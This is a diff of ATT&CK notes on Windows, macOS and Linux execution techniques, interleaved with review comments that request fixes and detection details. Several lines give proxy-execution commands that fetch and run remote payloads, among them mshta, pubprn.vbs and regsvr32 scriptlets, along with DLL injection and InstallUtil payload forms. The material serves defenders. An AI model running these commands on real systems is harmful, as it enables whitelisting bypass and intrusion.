* The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow compatibility of programs as Windows updates and changes its code. For example, application shimming feature that allows programs that were created for Windows XP to work with Windows 10. Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses API hooking to redirect the code as necessary in order to communicate with the OS. A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:
* `%WINDIR%\AppPatch\sysmain.sdb`
* `hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb`
* Custom databases are stored in:
* `%WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom`
* `hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom`
* To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to Bypass User Account Control (UAC) (RedirectEXE), inject DLLs into processes (InjectDll), and intercept memory addresses (GetProcAddress). Utilizing these shims, an adversary can perform several malicious acts, such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.
#### Windows
* [Understanding Shims](https://technet.microsoft.com/en-us/library/dd837644(v=ws.10).aspx)
* [Secrets of the Application Compatilibity Database (SDB) – Part 1](http://www.alex-ionescu.com/?p=39)
* [Secrets of the Application Compatilibity Database (SDB) – Part 2](http://www.alex-ionescu.com/?p=40)
* [Secrets of the Application Compatilibity Database (SDB) – Part 3](http://www.alex-ionescu.com/?p=41)
* [Secrets of the Application Compatilibity Database (SDB) – Part 4](http://www.alex-ionescu.com/?p=43)
* [Malicious Application Compatibility Shims](https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf)
* [Post Exploitation Persistence With Application Shims (Intro)](http://blacksunhackers.club/2016/08/post-exploitation-persistence-with-application-shims-intro/)
* [Windows 0wn3d By Default - Mark Baggett - Derbycon 2013](http://www.irongeek.com/i.php?page=videos/derbycon3/4206-windows-0wn3d-by-default-mark-baggett)
* Description: “In this talk we will discuss API Hooking, Process Execution Redirection, Hiding Registry keys and hiding directories on the hard drive. We must be talking about rootkits, right? Well yes, but not in the way you think. The Windows family of operating systems has all of these capabilities built right in! Using nothing but tools and techniques distributed and documented by Microsoft we can implement all of these rootkit functions. During this exciting talk I will present new attacks against Windows operating system that provide rootkit like functionality with built-in OS tools. In session, we’ll demonstrate how to leverage the Microsoft Application Compatibility Toolkit to help hide an attacker’s presence on your system. The Application Compatibility Toolkit allows you to create application shims that intercept and redirect calls from applications to the operating system. This native rootkit like capability is intended to make the Windows operating system compatible with very old or poorly written applications. Do DEP, ASLR, UAC, and Windows Resource Protection, File system ACLS and other modern OS security measures get it your way? No problem. Turn them off! Do you want to hide files and registry keys and from the user? The Application Compatibility toolkit allows you to create a virtual world for any application and hide resources from view. If someone inspects the registry with regedit they will see exactly what the attacker wants them to see and not what the OS sees when it launches programs. Did they patch your target so your exploit doesn’t work? Guess what, making applications backwards compatible is what this tool is intended to do. Make your favorite applications “old exploit compatible” insuring you can re-exploit the target with this awesome untapped resource. Everything you need to subvert windows applications is built right into the windows kernel. Come learn how to use the application compatibility toolkit to tap this great resource.”
* [Shackles, Shims, and Shivs - Understanding Bypass Techniques](http://www.irongeek.com/i.php?page=videos/derbycon6/535-shackles-shims-and-shivs-understanding-bypass-techniques-mirovengi)
-------------------------------
## CMSTP
* [CMSTP - ATT&CK](https://attack.mitre.org/wiki/Technique/T1191)
* The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
* Adversaries may supply CMSTP.exe with INF files infected with malicious commands. Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs and/or COM scriptlets (SCT) from remote servers. This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.
* CMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.
## Command-Line Interface
-------------------------------
## Command-Line Interface
* [Command-Line Interface - ATT&CK](https://attack.mitre.org/wiki/Technique/T1059)
* Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms.Wikipedia Command-Line Interface One example command-line interface on Windows systems is cmd, which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task). Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.
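Review bot: the CMSTP entry describes the abuse but never shows the invocation, so a reader cannot tell what to hunt for; add the canonical form `cmstp.exe /ni /s C:\path\to\profile.inf` (`/ni` suppresses the desktop icon, `/s` runs silently) and note that the detection handle is cmstp.exe making an outbound connection or spawning a child process, neither of which a normal profile install needs. Two text artifacts in the same hunk: `Regsvr32 / ”Squiblydoo”` opens with a closing curly quote, and the Command-Line Interface paragraph has the footnote label fused into the sentence (`platforms.Wikipedia Command-Line Interface One example`); strip the citation text or turn it into a link.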
@ -63,8 +64,35 @@
## Execution through API
-------------------------------
## Control Panel Items
* [Control Panel Items - ATT&CK](https://attack.mitre.org/wiki/Technique/T1196)
* Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.
* For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.
* Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via Spearphishing Attachment campaigns 23 or executed as part of multi-stage malware.4 Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.
-------------------------------
## Dynamic Data Exchange
* [Dynamic Data Exchange - ATT&CK](https://attack.mitre.org/wiki/Technique/T1173)
* Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.
* Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.123
* Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands45, directly or through embedded files6, and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.7 DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.
-------------------------------
## Execution through API
* [Execution through API - ATT&CK](https://attack.mitre.org/wiki/Technique/T1106)
* Adversary tools may directly use the Windows application programming interface (API) to execute binaries.
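Review bot: the three new sections keep the ATT&CK footnote numbers as bare digits fused to words (`campaigns 23`, `malware.4`, `keys.123`, `commands45`, `files6`, `macros.7`), which read as typos; either drop them or replace each with the reference it points to. For Control Panel Items it would help to name the execution path that the whitelisting bypass rides on: a `.cpl` is loaded through `rundll32.exe shell32.dll,Control_RunDLL <file>.cpl` (or `control.exe <file>.cpl`), and registered items are listed under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cpls`, so that rundll32 command line and writes to that key are the things to monitor.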
@ -92,12 +120,11 @@
## Execution through Module Load
-------------------------------
## Execution through Module Load
* [Execution through Module Load - ATT&CK](https://attack.mitre.org/wiki/Technique/T1129)
* The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess(), LoadLibrary(), etc. of the Win32 API.Wikipedia Windows Library Files
* The module loader can load DLLs:
* The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess(), LoadLibrary(), etc. of the Win32 API.1
* The module loader can load DLLs:
* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
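Review bot: the edit to the Execution through Module Load paragraph swaps one citation artifact for another: the old text ends `of the Win32 API.Wikipedia Windows Library Files` and the new text ends `of the Win32 API.1`, so the paragraph and the following `The module loader can load DLLs:` line appear twice in the hunk with only the footnote marker differing. Remove the trailing `1` as well (or link the reference) so the change actually cleans the paragraph up rather than leaving a different remnant.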
@ -107,17 +134,33 @@
-------------------------------
## Exploitation for Client Execution
* [Exploitation for Client Execution - ATT&CK](https://attack.mitre.org/wiki/Technique/T1203)
* Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
* **Browser-based Exploitation**
* Web browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.
* **Office Applications**
* Common office and productivity applications such as Microsoft Office are also targeted through Spearphishing Attachment, Spearphishing Link, and Spearphishing via Service. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.
* **Common Third-party Applications**
* Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
## Graphical User Interface
-------------------------------
## Graphical User Interface
* [Graphical User Interface - ATT&CK](https://attack.mitre.org/wiki/Technique/T1061)
* Cause a binary or script to execute based on interacting with the file through a graphical user interface (GUI) or in an interactive remote session such as Remote Desktop Protocol.
## InstallUtil
-------------------------------
## InstallUtil
* [InstallUtil - ATT&CK](https://attack.mitre.org/wiki/Technique/T1118)
* InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. InstallUtil is located in the .NET directory on a Windows system: `C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe`. InstallUtil.exe is digitally signed by Microsoft. Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)].
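Review bot: the InstallUtil entry gives the framework path and the `RunInstaller(true)` attribute but not the command that triggers the bypass; add `InstallUtil.exe /logfile= /LogToConsole=false /U C:\path\payload.dll`, explain that `/U` invokes the installer class's `Uninstall` method, which is where the payload is normally placed, and mention that the 64-bit copy lives under `C:\Windows\Microsoft.NET\Framework64\v<version>\`. The Exploitation for Client Execution paragraph has a grammar slip, `applications they commonly used to do work`, which should read `commonly use`.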
@ -128,18 +171,52 @@
-------------------------------
## LSASS Driver
* [LSASS Driver - ATT&CK](https://attack.mitre.org/wiki/Technique/T1177)
* The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
* Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., DLL Side-Loading or DLL Search Order Hijacking), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.
## Launchctl
-------------------------------
## Launchctl
* [Launchctl - ATT&CK](https://attack.mitre.org/wiki/Technique/T1152)
* Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made Sofacy Komplex Trojan. Running a command from launchctl is as simple as `launchctl submit -l <labelName> -- /Path/to/thing/to/execute "arg" "arg" "arg"`. Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges. Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.
## Powershell
-------------------------------
## Local Job Scheduling
* [Local Job Scheduling - ATT&CK](https://attack.mitre.org/wiki/Technique/T1168)
* On Linux and Apple systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, at, and launchd.3 Unlike Scheduled Task on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).
* **cron**
* System-wide cron jobs are installed by modifying `/etc/crontab` file, `/etc/cron.d/` directory or other locations supported by the Cron daemon, while per-user cron jobs are installed using crontab with specifically formatted crontab files.3 This works on Mac and Linux systems.
* Those methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use job scheduling to execute programs at system startup or on a scheduled basis for Persistence, to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.
* **at**
* The at program is another means on Linux-based systems, including Mac, to schedule a program or script job for execution at a later date and/or time, which could also be used for the same purposes.
* **launchd**
* Each launchd job is described by a different configuration property list (plist) file similar to Launch Daemon or Launch Agent, except there is an additional key called StartCalendarInterval with a dictionary of time values. This only works on macOS and OS X.
-------------------------------
## Mshta
* [Mshta - ATT&CK](https://attack.mitre.org/wiki/Technique/T1170)
* Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension `.hta`. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.
* Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code34567
* Files may be executed by mshta.exe through an inline script: `mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))`
* They may also be executed directly from URLs: `mshta http[:]//webserver/payload[.]hta`
* Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.
-------------------------------
## Powershell
* [PowerShell](https://attack.mitre.org/wiki/Technique/T1086)
* PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.TechNet PowerShell Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.
* PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
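Review bot: several citation remnants in this hunk read as broken sentences: `execute changes they made Sofacy Komplex Trojan` (Launchctl), `launchd.3` and `crontab files.3` (Local Job Scheduling), `execution of code34567` (Mshta) and `operating system.TechNet PowerShell Adversaries` (PowerShell); strip or link them. For LSASS Driver the paragraph never says where the load comes from, which is what a defender checks: LSA packages are registered under `HKLM\SYSTEM\CurrentControlSet\Control\Lsa` (`Security Packages`, `Authentication Packages`) and `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig`, and LSA Protection (`RunAsPPL` = 1 under the same `Lsa` key) refuses unsigned DLLs in lsass.exe, so both deserve a line.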
@ -156,24 +233,9 @@
## Process Hollowing
-------------------------------
* [Process Hollowing - ATT&CK](https://attack.mitre.org/wiki/Technique/T1093)
* Process hollowing occurs when a process is created in a suspended state and the process's memory is replaced with the code of a second program so that the second program runs instead of the original program. Windows and process monitoring tools believe the original process is running, whereas the actual program running is different. Hollowing Process hollowing may be used similarly to DLL Injection to evade defenses and detection analysis of malicious process execution by launching adversary-controlled code under the context of a legitimate process.
#### Windows
* [Process Hollowing - John Leitch - PDF](http://www.autosectools.com/process-hollowing.pdf)
* [Process-Hollowing](https://github.com/m0n0ph1/Process-Hollowing)
* Great explanation of Process Hollowing
## Regsvcs/Regasm
-------------------------------
## Regsvcs/Regasm
* [Regsvcs/Regasm - ATT&CK](https://attack.mitre.org/wiki/Technique/T1121)
* Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft.MSDN RegsvcsMSDN Regasm Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: `[ComRegisterFunction]` or `[ComUnregisterFunction]` respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute.SubTee GitHub All The Things Application Whitelisting Bypass
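Review bot: the Regsvcs/Regasm paragraph has the same fused-citation problem (`Microsoft.MSDN RegsvcsMSDN Regasm Adversaries`, `fails to execute.SubTee GitHub All The Things Application Whitelisting Bypass`) and should name the invocation: `regsvcs.exe payload.dll` and `regasm.exe /U payload.dll`, where `/U` runs the `[ComUnregisterFunction]` method and is the usual choice for exactly the reason the text gives, the attributed code runs even when the registration itself fails for lack of privilege. The Process Hollowing block removed here should be checked against the copy inserted at the top of the file so the move is intentional rather than leaving the technique in a tactic where ATT&CK no longer lists it.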
@ -188,8 +250,9 @@
## Regsvr32
-------------------------------
## Regsvr32
* [Regsvr32 - ATT&CK](https://attack.mitre.org/wiki/Technique/T1117)
* Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries.Microsoft Regsvr32
* Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.
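Review bot: the Regsvr32 entry says the binary `can be used to execute arbitrary binaries` but never shows the scriptlet form that makes it matter for whitelisting bypass; add `regsvr32.exe /s /n /u /i:http://<host>/payload.sct scrobj.dll`, note that `/n` skips DllRegisterServer and `/i` hands the URL to DllInstall, and point out that the scriptlet never has to touch disk, which is why command-line logging (Sysmon Event ID 1, or 4688 with command-line auditing) rather than file monitoring is what catches it. `Windows systems.Microsoft Regsvr32` is another fused citation to clean up.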
@ -207,8 +270,8 @@
## Rundll32
-------------------------------
## Rundll32
* [Rundll32 - ATT&CK](https://attack.mitre.org/wiki/Technique/T1085)
* The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.
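Review bot: `The rundll32.exe program can be called to execute an arbitrary binary` overstates it: rundll32 loads a DLL and calls a named export, `rundll32.exe <path>\payload.dll,<ExportName> [args]`, so a plain EXE cannot be run this way. Rewording to `an arbitrary DLL export` and giving that syntax also makes the detection angle obvious: rundll32 with a DLL loaded from a user-writable path is the thing to alert on.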
@ -219,8 +282,8 @@
## Scheduled Tasks
-------------------------------
## Scheduled Tasks
* [Scheduled Tasks - ATT&CK](https://attack.mitre.org/wiki/Technique/T1053)
* Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. The account used to create the task must be in the Administrators group on the local system. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on.TechNet Task Scheduler Security An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.
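Review bot: `The account used to create the task must be in the Administrators group on the local system` holds for `at.exe` but not for `schtasks.exe`: a standard user can `schtasks /create` a task that runs as themselves, and only tasks that run as SYSTEM or another account (`/RU`) or with `/RL HIGHEST` need an elevated context; qualify the sentence so readers do not dismiss non-admin task creation as impossible. `turned on.TechNet Task Scheduler Security An adversary` is another fused citation. The evidence sources are worth adding too: task XML under `%SystemRoot%\System32\Tasks` and Security log event 4698 (task created) when object-access auditing is on.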
@ -242,8 +305,9 @@
## Scripting
-------------------------------
## Scripting
* [Scripting - ATT&CK](https://attack.mitre.org/wiki/Technique/T1064)
* Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts. Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. MetasploitMetasploit, VeilVeil, and PowerSploitPowersploit are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell.Alperovitch 2014
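Review bot: the Scripting paragraph doubled the tool names when the citation labels were pasted (`MetasploitMetasploit, VeilVeil, and PowerSploitPowersploit`) and ends with `PowerShell.Alperovitch 2014`; fix to `Metasploit, Veil, and PowerSploit` and either link or drop the citation.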
@ -258,8 +322,9 @@
## Service Execution
-------------------------------
## Service Execution
* [Service Execution - ATT&CK](https://attack.mitre.org/wiki/Technique/T1035)
* Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.
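Review bot: Service Execution would read better with the concrete commands and their log trail, since that is what ties this entry to the New Service and Modify Existing Service entries it references: `sc.exe create <name> binPath= "<command>"` followed by `sc.exe start <name>` (PsExec creates and starts a service the same way), which leaves System log 7045 and, with the right audit policy, Security log 4697 for the install. Note that the space after `binPath=` is required by sc.exe's argument parser.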
@ -273,8 +338,39 @@
## Source
-------------------------------
## Signed Binary Proxy Execution
* [Signed Binary Proxy Execution - ATT&CK](https://attack.mitre.org/wiki/Technique/T1218)
* Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.
* **Mavinject.exe**
* Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process.1
* `"C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" <PID> /INJECTRUNNING <PATH DLL>`
* `C:\Windows\system32\mavinject.exe <PID> /INJECTRUNNING <PATH DLL>`
* **SyncAppvPublishingServer.exe**
* SyncAppvPublishingServer.exe can be used to run powershell scripts without executing powershell.exe.
* Several others binaries exist that may be used to perform similar behavior.
-------------------------------
## Signed Binary Proxy Execution
* [Signed Script Proxy Execution - ATT&CK](https://attack.mitre.org/wiki/Technique/T1216)
* Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.
* PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site.
* Example command: `cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png`
* There are several other signed scripts that may be used in a similar manner.
-------------------------------
## Source
* [Source - ATT&CK](https://attack.mitre.org/wiki/Technique/T1153)
* The source command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways `source /path/to/filename [arguments]` or . `/path/to/filename [arguments]`. Take note of the space after the ".". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell's environment. Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.
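Review bot: the second heading in this hunk is wrong: the section that links to T1216 is titled `## Signed Binary Proxy Execution` again, duplicating the T1218 heading above it; it should be `## Signed Script Proxy Execution` (the link text already says so, and the duplicate heading will collide in the table of contents). Two smaller points: `Mavinject can be used to input a DLL into a running process` should read `inject a DLL`, and in the Source entry the code spans are split so the dot form renders as `.` followed by `/path/to/filename [arguments]`; make `. /path/to/filename [arguments]` a single code span so the space the text tells the reader to notice is actually inside it.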
@ -285,8 +381,9 @@
## Spaces after Filename
-------------------------------
## Spaces after Filename
* [Spaces after Filename - ATT&CK](https://attack.mitre.org/wiki/Technique/T1151)
* Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to "evil.txt " (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed.
@ -297,9 +394,9 @@
## Third-Party Software
-------------------------------
Third-Party Software
## Third-Party Software
* [Third-Party Software - ATT&CK](https://attack.mitre.org/wiki/Technique/T1072)
* Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code.
* Adversaries may gain access to and use third-party application deployment systems installed within an enterprise network. Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
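Review bot: the bare line `Third-Party Software` sitting above `## Third-Party Software` looks like a leftover from an earlier edit rather than part of this change (it also appears as the function context in the next two hunk headers, so it is in the file); if this hunk is not already deleting it, delete it here.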
@ -309,8 +406,8 @@ Third-Party Software
## Trap
-------------------------------
## Trap
* [Trap - ATT&CK](https://attack.mitre.org/wiki/Technique/T1154)
* The `trap` command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format `trap` 'command list' signals where "command list" will be executed when "signals" are received.
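Review bot: The format string at the end of the Trap entry is broken by the code span: `trap` 'command list' signals. Write it as one span, `trap 'command list' signals`, so the single quotes survive Markdown rendering and the form matches the sentence that follows it ("command list" runs when "signals" are received).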
@ -329,8 +426,9 @@ Third-Party Software
## Trusted Developer Utilites
------------------------------
## Trusted Developer Utilites
Trusted Developer Utilities
* [Trusted Developer Utilities -* ATT&CK](https://attack.mitre.org/wiki/Technique/T1127)
* There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application whitelisting defensive solutions.
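Review bot: Heading typo: `## Trusted Developer Utilites` should read `Utilities`, as the link text and the bare `Trusted Developer Utilities` line below it already do; that bare line is then redundant with the heading and can go. The link text also carries a stray asterisk, `[Trusted Developer Utilities -* ATT&CK]`, which should be `- ATT&CK` like every other entry.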
@ -372,8 +470,22 @@ Trusted Developer Utilities
## Windows Management Instrumentation
-------------------------------
## User Execution
* [User Execution - ATT&CK](https://attack.mitre.org/wiki/Technique/T1204)
* An adversary may rely upon specific actions by a user in order to gain execution. This may be direct code execution, such as when a user opens a malicious executable delivered via Spearphishing Attachment with the icon and apparent extension of a document file. It also may lead to other execution techniques, such as when a user clicks on a link delivered via Spearphishing Link that leads to exploitation of a browser or application vulnerability via Exploitation for Client Execution. While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it.
-------------------------------
## Windows Management Instrumentation
* [Windows Management Instrumentation - ATT&CK](https://attack.mitre.org/wiki/Technique/T1047)
* Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB)Wikipedia SMB and Remote Procedure Call Service (RPCS)TechNet RPC for remote access. RPCS operates over port 135.MSDN WMI An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement.FireEye WMI 2015
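Review bot: The WMI description keeps the citation labels pasted from the ATT&CK page as bare prose, e.g. `(SMB)Wikipedia SMB`, `port 135.MSDN WMI` and `Lateral Movement.FireEye WMI 2015`; they read as part of the sentence. Either strip them or turn them into link bullets, as the other sections do with their references. The new User Execution block itself reads fine.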
@ -401,8 +513,9 @@ Trusted Developer Utilities
## Windows Remote Management
-------------------------------
## Windows Remote Management
* [Windows Remote Management - ATT&CK](https://attack.mitre.org/wiki/Technique/T1028)
* Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).Microsoft WinRM It may be called with the winrm command or by any number of programs such as PowerShell.Jacobsen 2014
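Review bot: Same citation residue in the WinRM entry: `services).Microsoft WinRM` and `PowerShell.Jacobsen 2014` are reference labels, not prose. Strip them or convert them to links; the identical paragraph is also added to Lateral Movement.md in this commit, so fix both copies together.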


+76 -0 Draft/ATT&CK-Stuff/Initial_Access.md

@ -0,0 +1,76 @@
# Initial Access
* [MITRE ATT&CK - Initial Access](https://attack.mitre.org/wiki/Initial_Access)
* The initial access tactic represents the vectors adversaries use to gain an initial foothold within a network.
-------------------------------
## Drive-by-Compromise
* [Drive-by-Compromise - ATT&CK](https://attack.mitre.org/wiki/Technique/T1189)
* A drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation.
-------------------------------
## Exploit Public-Facing Application
* [Exploit Public-Facing Application - ATT&CK](https://attack.mitre.org/wiki/Technique/T1190)
